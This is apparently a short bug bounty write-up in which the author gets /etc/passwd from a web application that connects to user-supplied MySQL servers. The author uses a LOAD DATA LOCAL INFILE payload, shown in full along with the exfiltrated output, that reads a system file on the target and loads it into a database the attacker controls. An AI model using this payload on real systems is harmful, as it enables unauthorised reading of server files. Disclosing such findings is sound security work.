Client, not client!

Tung Pun
Tung Pun
Sep 15 · 2 min read

This blog describes one of my findings on a private program. The attack vector is simple, short and elegant (at least for me).

Simplicity is the ultimate sophistication.

One day, HackerOne asked me to join a private program. OK. I decided to have a look.

After creating the test account, I was asked to fill the source info:

Database connection parameters are required! (The website frontend has been changed to protect their privacy)

There is a MySQL client in the application, it will connect to our own MySQL server. So, I created the new user, database, table on my server and open that port. For the SQL SELECT box, fill this payload:

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE dadadb.dadatable FIELDS TERMINATED BY "\n"

Then sent the request and got the target file /etc/passwd on my server.

mysql> select * from test;
+----------------------------------------------+
| value |
+----------------------------------------------+
| root:x:0:0:root:/root:/bin/bash | | ... |
| ... |
+----------------------------------------------+

Submit the report and got the bounty.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade